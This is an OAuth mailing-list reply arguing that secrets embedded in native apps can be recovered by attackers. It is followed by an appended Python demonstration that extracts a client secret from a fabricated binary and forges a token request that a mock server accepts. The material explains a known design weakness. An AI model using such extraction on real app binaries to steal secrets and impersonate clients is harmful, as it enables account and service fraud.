The group is operating under the assumption that most native apps are publicly deployed or that copies of the app bundle/binary can at least be obtained by a malicious party. Whether an open system or a highly protected system like the PlayStation 3, it's always possible for the attacker to disassemble the program and obtain the secret. The secret is the key to an app proving its identity, so as soon as an attacker obtains the secret it can forge the identity of an app insofar as the OAuth auth server is concerned.
On Jun 1, 2011, at 7:17 PM, Dave Nelson wrote:
>> Most native apps will be forgeable ...
>
> I don't understand the rationale behind this assertion. Would you
> please point me to the discussion that elaborates on this point.
> Thanks!
>
> Regards,
>
> Dave
>
> David B. Nelson
> Sr. Software Architect
> Elbrys Networks, Inc.
> www.elbrys.com
> +1.603.570.2636
_______________________________________________
OAuth mailing list
OAuth@ietf.org
https://www.ietf.org/mailman/listinfo/oauth
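The extraction-and-forgery step the reply above describes, as an added example that is not part of the original mailing-list post or any OAuth implementation: a `strings(1)`-style scan pulls a client secret out of a constructed stand-in for a shipped native binary, and the recovered pair is then placed in a token request that the auth server cannot distinguish from one sent by the genuine app. The binary blob, `CLIENT_ID`, `CLIENT_SECRET`, the endpoint URL and the `REGISTERED_CLIENTS` table are all made up for the example.

```python
"""Added example, not from the mailing-list post: recovering an OAuth client
secret baked into a native app binary and presenting it to the auth server.

Everything here is constructed: the 'binary' is a fabricated byte blob, and
the client_id / client_secret / token endpoint are placeholder values.
"""
import re
from urllib.parse import parse_qs, urlencode

# Constructed values standing in for a real app's registered credentials.
CLIENT_ID = "native-app-example"
CLIENT_SECRET = "s3cr3t-baked-into-the-binary"

# Constructed stand-in for a shipped app binary: opaque code bytes with the
# credentials linked in as plain NUL-terminated strings, as a naive build does.
FAKE_BINARY = (
    b"\x7fELF\x02\x01\x01" + bytes(range(0, 32))
    + b"client_id=" + CLIENT_ID.encode() + b"\x00"
    + b"\x90" * 32
    + b"client_secret=" + CLIENT_SECRET.encode() + b"\x00"
    + bytes(range(128, 256))
    + b"https://auth.example.test/token\x00"
)

# What the (hypothetical) auth server holds for client authentication.
REGISTERED_CLIENTS = {CLIENT_ID: CLIENT_SECRET}


def extract_strings(blob: bytes, min_len: int = 8) -> list[str]:
    """Minimal strings(1): every run of printable ASCII at least min_len long."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, blob)]


def find_credentials(blob: bytes) -> dict[str, str]:
    """Pick out key=value strings whose key names an OAuth client credential.

    This is the whole 'attack': no disassembly is even needed when the secret
    is stored as a literal, and a packed or obfuscated secret only raises the
    effort, since the app must still reconstruct it at runtime.
    """
    creds: dict[str, str] = {}
    for s in extract_strings(blob):
        m = re.fullmatch(r"(client_id|client_secret)=(\S+)", s)
        if m:
            creds[m.group(1)] = m.group(2)
    return creds


def forge_client_auth(creds: dict[str, str], code: str, redirect_uri: str) -> str:
    """Body of the token request the attacker sends with the recovered secret.

    The authorization code is whatever the attacker obtained separately; the
    point is that client authentication itself is satisfied by the stolen pair.
    """
    return urlencode({
        "grant_type": "authorization_code",
        "code": code,
        "redirect_uri": redirect_uri,
        "client_id": creds["client_id"],
        "client_secret": creds["client_secret"],
    })


def auth_server_accepts(body: str) -> bool:
    """The auth server's client authentication, reduced to its essence: compare
    the presented secret with the registered one. A request built from the
    extracted secret is indistinguishable from one sent by the genuine app."""
    params = {k: v[0] for k, v in parse_qs(body).items()}
    registered = REGISTERED_CLIENTS.get(params.get("client_id", ""))
    return registered is not None and registered == params.get("client_secret")


if __name__ == "__main__":
    stolen = find_credentials(FAKE_BINARY)
    print("recovered from binary:", stolen)
    body = forge_client_auth(stolen, "AUTHCODE", "myapp://callback")
    print("auth server accepts forged client:", auth_server_accepts(body))
```

Run as a script it prints the recovered pair and `True` for the forged request; the takeaway is that the auth server has no signal other than the secret, so once the secret is in the binary the app's identity is public.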